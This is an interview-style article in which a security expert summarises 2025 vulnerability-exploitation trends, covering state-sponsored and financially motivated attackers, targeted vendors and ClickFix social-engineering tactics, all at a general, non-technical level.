Diving into the complex world of cybersecurity, we’re thrilled to speak with Malik Haidar, a seasoned expert who has spent years safeguarding multinational corporations from digital threats. With a sharp focus on analytics, intelligence, and integrating business strategies into security frameworks, Malik offers a unique perspective on the evolving landscape of cyber risks. In this interview, we explore critical insights from recent findings on state-sponsored hacking, the surge in vulnerability exploits, the tactics of financially motivated groups, and emerging social engineering trends. Join us as we uncover the strategies behind these threats and what they mean for the future of digital security.
Can you walk us through the key findings from recent research about the role of state-sponsored hackers in vulnerability exploits during the first half of 2025?
Absolutely, Olivia. A recent report highlighted that state-sponsored hackers were responsible for over half—specifically 53%—of all attributed vulnerability exploits in the first half of 2025. These actors are typically well-resourced and focus on strategic, geopolitical goals like espionage and surveillance. What’s striking is their ability to weaponize vulnerabilities almost immediately after they’re disclosed, turning flaws into tools for targeted, persistent campaigns against specific sectors or high-value systems.
What drives these state-sponsored attacks, and why are they so concerning?
The primary motives are rooted in geopolitics—think espionage, gaining strategic advantages, or monitoring critical infrastructure. These aren’t random hits; they’re calculated efforts to infiltrate systems that hold sensitive data or control key operations. The concern comes from their persistence and the resources behind them. Unlike opportunistic attacks, these campaigns are often backed by nation-states, meaning they have the funding and expertise to keep probing until they succeed, which poses a significant challenge for defenders.
The research pointed to a heavy involvement of Chinese state-sponsored groups in these exploits. Can you elaborate on this trend and what they’re targeting?
Yes, the data shows that a majority of state-sponsored campaigns traced back to Chinese actors. They’ve been particularly focused on edge infrastructure and enterprise solutions—systems that sit at the perimeter of networks or manage large-scale operations. This trend has been consistent since at least 2024. These targets are critical because they often act as gateways, providing access to broader networks or encrypted traffic, making them a goldmine for espionage or disruption.
Can you share an example of a specific group and the kind of technology they’ve been going after?
Certainly. One group that stands out is UNC5221, which is suspected to be China-linked. They’ve exploited more vulnerabilities than any other in the first half of 2025, with a particular focus on Ivanti products like Endpoint Manager Mobile, Connect Secure, and Policy Secure. These are tools used for remote access and endpoint management, so compromising them can give attackers a foothold into an organization’s entire network, often undetected for a long time.
Shifting gears, how significant is the role of financially motivated groups in these vulnerability exploits compared to state-sponsored actors?
They’re a major player, accounting for 47% of the exploits. Within that, 27% are tied to groups focused on theft and fraud—think stealing data or credentials for direct financial gain—while 20% are linked to ransomware and extortion gangs. These groups aren’t after geopolitical leverage; they’re in it for the money, and they’re just as relentless, exploiting the same kinds of flaws to lock down systems or siphon off valuable information.
Certain systems like edge security appliances and remote access tools seem to be prime targets. Why are these so attractive to both state-sponsored and financially motivated attackers?
These systems are the front door to an organization’s network. Edge security appliances and remote access tools handle encrypted traffic and privileged access, so compromising them offers a high reward—whether it’s for stealing data, planting surveillance tools, or deploying ransomware. They’re often exposed to the internet, making them easier to attack, and they’re used across industries, so the impact of a breach can be massive. Sectors like finance, healthcare, and critical infrastructure are especially at risk because they rely heavily on these technologies.
Microsoft emerged as the most targeted vendor in the findings. What makes their products such a frequent focus for exploits?
Microsoft’s products accounted for 17% of all exploitations, and that’s largely due to their ubiquity. Their software—think Windows, Office, and server solutions—is used by countless organizations worldwide, so attackers know there’s a huge pool of potential targets. Many of their tools are deeply integrated into business operations, which means a single flaw can ripple across an entire ecosystem. While specific products weren’t always detailed, historically, things like Exchange Server and Active Directory have been hotspots due to their critical role in email and user management.
A significant number of exploited vulnerabilities didn’t require authentication. Can you explain why that’s such a critical issue for cybersecurity?
It’s a huge problem because 69% of the 161 vulnerabilities exploited in this period needed no authentication—meaning attackers don’t need credentials or insider access to strike. On top of that, 48% could be exploited remotely over a network. This combination is deadly; it allows attackers to launch direct assaults from the internet against vulnerable systems with minimal barriers. The risk skyrockets because these flaws can be exploited at scale, often before organizations even realize they’re exposed.
The report also noted a rise in social engineering tactics like ClickFix among ransomware groups. Can you describe how these attacks work and why they’re so effective?
ClickFix is a devious tactic where attackers trick users into infecting themselves. Typically, a victim sees a fake error or verification message that prompts them to copy and paste a malicious script or file path and run it. It’s effective because it exploits human nature—people want to fix issues quickly without involving IT. By getting the user to execute the attack, it bypasses many security controls. Ransomware groups have leaned into this, and we’ve seen variations like FileFix evolve, where users are misled into accessing malicious paths via Windows File Explorer.
Looking ahead, what is your forecast for the trajectory of social engineering tactics like ClickFix in the cybersecurity landscape?
I expect tactics like ClickFix to remain a favored method for initial access through 2025 and beyond, unless we see widespread user education or technical mitigations. Attackers are getting smarter, evolving these tricks to be more convincing and harder to detect. As long as humans are the weakest link—and we often are—social engineering will be a go-to for ransomware and other threat actors. The challenge is staying ahead with training and tools that can intercept these deceptions before they take root.
